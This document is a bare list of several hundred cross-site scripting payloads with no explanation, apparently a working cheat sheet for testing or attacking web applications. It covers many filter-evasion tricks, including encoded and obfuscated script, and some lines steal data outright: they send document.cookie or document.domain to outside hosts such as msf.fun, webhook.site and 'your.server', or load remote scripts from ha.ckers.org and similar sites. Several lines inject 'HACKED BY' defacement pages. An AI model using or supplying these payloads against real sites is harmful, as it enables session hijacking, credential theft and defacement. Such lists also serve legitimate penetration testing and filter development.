<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
<math><x xlink:href=javascript:confirm`1`>click
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<svg onload=alert&#0000000040document.cookie)>
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//google.com\76-->
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
javascript:%ef%bb%bfalert(XSS)
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
"><video><source onerror=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==hashtag#x" /></svg>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<svg/onload=location=‘javas’%2B‘cript:’%2B
‘ale’%2B‘rt’%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<SCRIPT>location=%27javasCript:alert\x281\x29%27</SCRIPT>
';k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;&sol;(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(VulneravelXSS%26%2300000000000000000041//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
">"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<a"/onclick=(confirm)()>Click Here!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg onx=() onload=window.alert?.()> 
test",prompt%0A/*HelloWorld*/(document.domain) 
"onx+%00+onpointerenter%3dalert(domain)+x" 
"><svg%20onload=alert%26%230000000040"1")> 
%27%09);%0d%0a%09%09[1].find(alert)//
"><img src=1 onmouseleave=print()> 
<svg on onload=(alert)(document.domain)> 
<svg/on%20onload=alert(1)> 
<img/src=x onError="`${x}`;alert(`Ex.Mi`);"> 
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<audio autoplay onloadstart=this.src='hxxps://msf.fun/?c='+document["cook"+"ie"]' src=x>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert)   or    (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'
'">>'-[document.domain].map(alert)-'
<svg onload=alert&#0000000040"1")>
%2F%2Fj%5C%5Cjavascript%3Aalert%28document.domain%29
//j\javascript:alert(document.domain)
{{constructor.constructor(alert`KUNX`)()}}
"><svg+onload=alert&amp;#x60"1 
"><svg+onload=alert&amp;#x2B"1 
"><svg+onload=alert&amp;#x5C"1 
"><svg+onload=alert&amp;#x99"1 
"><svg+onload=alert&amp;#x92"1 
"><svg onload=alert&amp;#x27;#x00000040"1")> 
"><svg+onload=alert&amp;#x8F"1 
"><SVG ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&#x6f&#x6d&#x61&#x69&#x6e)> 
"><svg+onload=alert&amp;#x45"1 
<svg%20onload=prompt%26%230000000040document.domain)>
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
&lt;/h2&gt;&lt;/div&gt;&lt;/div&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
' ">><math><x xlink:href=javascript:confirm`1`>click
" onfocus=alert(document.domain) "> <"
<a onclick="location.href=\&fjlig;avascript:alert(1337)*">go</a>
&nvlt;svg onload=alert`1337`>
<iframe src-doc=<svg onload=alert(1337)&nvgt;"></iframe
<iframe src-doc="<svg onload=confirm`1337`&nvgt;"></iframe
&nvgt;svg onload=alert`1337`&nvgt;
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg onload=(function(){let arr=(41, 49, 40, 116, 114, 101, 108, 97). reverse(). map(e=>String. fromCharCode(e )); let func=new Function(...arr); func(); })()>
<img/src/onerror="(function(x){this[x+'ert'](1))) al">
<img/src/onerror="window['al +/e/['exec]ert'](2)">
<img/src/onerror="document['default'+'View']['al +/e/['exec]'e'+'rt'](3)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
"><svg><animate onbegin=alert('hacked') attributeName=x></svg>
<a href=javascript:alert('hacked')>Click Here</a>
confirm?.(1)
%3Ca%20href=%27jav%26%23x41;script:alert%28document.cookie%29%27%3EClick+Me
<div ng-app> <strong class="ng-init:constructor. constructor('alert('hacked'))()">aaa</strong> </ div>
<<TexTArEa/%00//%00/c="not"/*%00///AutoFocUs////onFoCUS =alert hacked //
<DETAILS%Oaopen%OaonToGgle%0d%3d%0aa%3dprompt, a(origin)%20x>
<dETAILS%Oaopen%OaonToGgle%0d%3d%0aa%3dprompt, a(origin)%20x>
&#x3C;&#x69;&#x6D;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x78;&#x20;&#x6F;&#x6E;&#x65;&#x72;&#x72;&#x6F;&#x72;&#x3D;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3E;  
%6a%61%76%61%73%63%72%69%70%74&#58;alert&#40;1&#41;    
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20style=%22color:red;font-size:50px;%22%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%20%3Cspan%20style=%22color:red;font-size:60px;%22%3E1BR0%3C/span%3E%3C/marquee%3E
';a=prompt,a()//?aspxerrorpath=/MDMServiceConfig%20%3Cimg%20src=1%20onerror=alert(1)%3E%3Cdiv%20style=%22overflow:%20hidden;%20white-space:%20nowrap;%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%20scrollamount=%2210%22%3EHACKED%20BY%201BR0%3C/marquee%3E%3C/div%3E%3Ctitle%3EWelcome%20to%20Hacked%20Page%3C/title%3E%3Cbody%20style=%22background-color:%20black;%20color:%20white;%20font-family:%20Arial,%20sans-serif;%22%3E%3Ch1%3EWelcome%20to%20the%20Hacked%20Page%3C/h1%3E%3Cp%3EThis%20page%20has%20been%20hacked!%3C/p%3E%3Cmenu%3E%3Cli%3E%3Ca%20href=%22#%22%3EHome%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EAbout%20Us%3C/a%3E%3C/li%3E%3Cli%3E%3Ca%20href=%22#%22%3EContact%3C/a%3E%3C/menu%3E%3Cstyle%3Eh1%20{%20animation:%20rainbowText%205s%20infinite;%20}%20@keyframes%20rainbowText%20{%200%%20{%20color:%20red;%20}%2016%%20{%20color:%20orange;%20}%2033%%20{%20color:%20yellow;%20}%2050%%20{%20color:%20green;%20}%2066%%20{%20color:%20blue;%20}%2083%%20{%20color:%20indigo;%20}%20100%%20{%20color:%20violet;%20}%20}%3C/style%3E%3C/body%3E
<button%20popover target=x>Click%20me</button><img%20onbeforetoggle=alert(1)%20popover%20id=x>XSS
/><img src=&#120;&#32;&#111;&#110;&#101;&#114;&#114;&#111;&#114;&equals; &apos;&#102;&#101;&#116;&#99;&#104;&lpar;&grave;&sol;&sol;&#119;& #101;&#98;&#104;&#111;&#111;&#107;&period;&#115;&#105;&#116;&#101 ;&sol;&#98;&#102;&#48;&#56;&#99;&#54;&#57;&#101;&#45;&#98;&#52;&# 55;&#97;&#45;&#52;&#48;&#50;&#52;&#45;&#56;&#97;&#99;&#57;&#45;&# 100;&#100;&#53;&#100;&#53;&#49;&#97;&#102;&#51;&#57;&#100;&#51;&q uest;&#120;&equals;&grave;&plus;&#100;&#111;&#99;&#117;&#109;&#10 1;&#110;&#116;&period;&#99;&#111;&#111;&#107;&#105;&#101;&rpar;&a pos;&gt;>
{{{=".sub).call.call({}{$='constructor'].getOwnPropertyDescriptor(proto S).value,0,'alert(1)")(){}
<!--><Svg OnLoad=(confirm)("XSS")<!--.html
<svg/ONxss='0'/ONload=location=window['atob']'amF2YXNjcmlwdDphbGVydCgxKQ==';
">-setTimeout'\u0028alert(1)\u0029'-’
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") > 
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 
"/>&lt;script>alert(1)&lt;/script>"/>
"><img src=x onerrora=confirm() onerror=confirm(1)>
"javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie"
"><img only src=1 onerror=alert()>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
">%20<img src=o onerror​=alert``>//
'"><svg><animate onbegin​=alert('hacked') attributeName=x></svg> 
<a href=javascript​:alert('hacked')>Click Here</a>
<IFRAME SRC="javascript​:alert('hacked');"></IFRAME>
<div ng-app> <strong class="ng-init:constructor.constructor('alert('hacked')')()">aaa</strong> </div>
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS​=alert`hacked` //
<a"/onclick=(confirm)()>Click Here!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain) (working)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg onx=() onload=window.alert?.()> (working)
test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic
"onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic
"><svg%20onload=alert%26%230000000040"1")> (working)- @IamRenganathan
%27%09);%0d%0a%09%09[1].find(alert)//
"><img src=1 onmouseleave=print()> - @itsgeekymonk
<svg on onload=(alert)(document.domain)> -@zapstiko
<svg/on%20onload=alert(1)> (working) -@aufzayed
<img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=p...
"><img src=x onerror=alert(1)>
<svg/onload=prompt'1'>
<svg onload=prompt%26%23x000000028;document.domain)>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img src=x on onerror=alert()>
<img/ignored=()%0Asrc=x%0Aonerror=prompt(1)>
<svg onload=prompt%26%230000000040document.domain)>
<a"/onclick=(confirm)()>click
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>
<--`<img/src=` onerror=confirm``> --!>
<!<script>confirm(1)</script>
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<a href=javascript&colon;confirm(1)>
<a href="jav%0Dascript&colon;alert(1)">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
#javascript:alert(2);
"><svg onload=alert(1)>
test@gmail.com%27\%22%3E%3Csvg/o...
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<iframe src="javascript:alert(document.domain)"></iframe>
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
<isindex+type=image+src=1+onerror=alert(1)>
<img src=x onerror="alert(origin)">
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;	
ibro"*alert(1)*"
"><body/onload="{x:onerror=alert};x"	
<script>eval('al'+'ert(1)');</script>
'alert(1)'.replace(/.+/,eval)
<img src/onerror=alert(1)>
<img onfocus=alert(1) autofocus tabindex=1>	
<p onfocus=alert(1) autofocus tabindex=1>	
<form onfocus=alert(1) autofocus tabindex=1>	
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>	
<wbr onfocus=alert(1) autofocus tabindex=1>	
<hgroup onfocus=alert(1) autofocus tabindex=1>	
<ul onfocus=alert(1) autofocus tabindex=1>	
<video onfocus=alert(1) autofocus tabindex=1>	
<mark onfocus=alert(1) autofocus tabindex=1>	
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">	
<plaintext onfocus=alert(1) autofocus tabindex=1>	
<video controls src=1 onfocus=alert(1) autofocus>	
<svg><image href=1 onerror=alert(1)>	
<audio src/onerror=alert(1)>	
<ol onfocus=alert(1) autofocus tabindex=1>	
<image2 onfocus=alert(1) autofocus tabindex=1>	
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--
a'-alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
';alert(document.cookie)//
<svg/onload​=alert/*1337*/(1)>
<svg/onload​=alert//&NewLine;(2)>
<svg/onload​=alert&sol;**&sol;(3)>
<svg/onload​=alert/&#42;&#42;/(4)>
<svg/onload​=alert&#x2F;**&#47;(5)>
confirm?.(1) 
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
<svg%20onload=alert%28document.domain%29>
<script ~~~>alert(0%0)</script ~~~>
"ontouchend%3Dprompt%281%29+class%3Dd3rk+
"><svg onScroll="javascript:alert(1)//
"<!--><Svg OnLoad=confirm?.(/d3rk😈/)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk😈/)<!--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
url=%26%2302java%26%23115cript:alert(document.domain)
%26%2302java%26%23115cript:alert(document.domain)
">>>>>><marquee>RXSS</marquee></head><abc%3E</script><script>alert(document.cookie)</script><meta
“><iMg SrC=x onError​=prompt()>
"><​script>prompt()<​/script>
<Svg On Only=1 Onload=alert("hex")>
"><script>alert(document.cookie)</script>
<<​script>script>prompt()<​/script>
<svg/onload​=prompt()>
<Svg On Only=1 Onload=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<!</textarea <body onload='alert(1)'>
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
themecolor=%22-alert('XSS')-%22
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
#'%26%26'javascript:alert%25281%2529//
</a onmousemove="alert(1)">
<svg onload=alert (1337)&nvgt;
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al+/e/[`ex + `ec`]`e`+`rt`](2)">
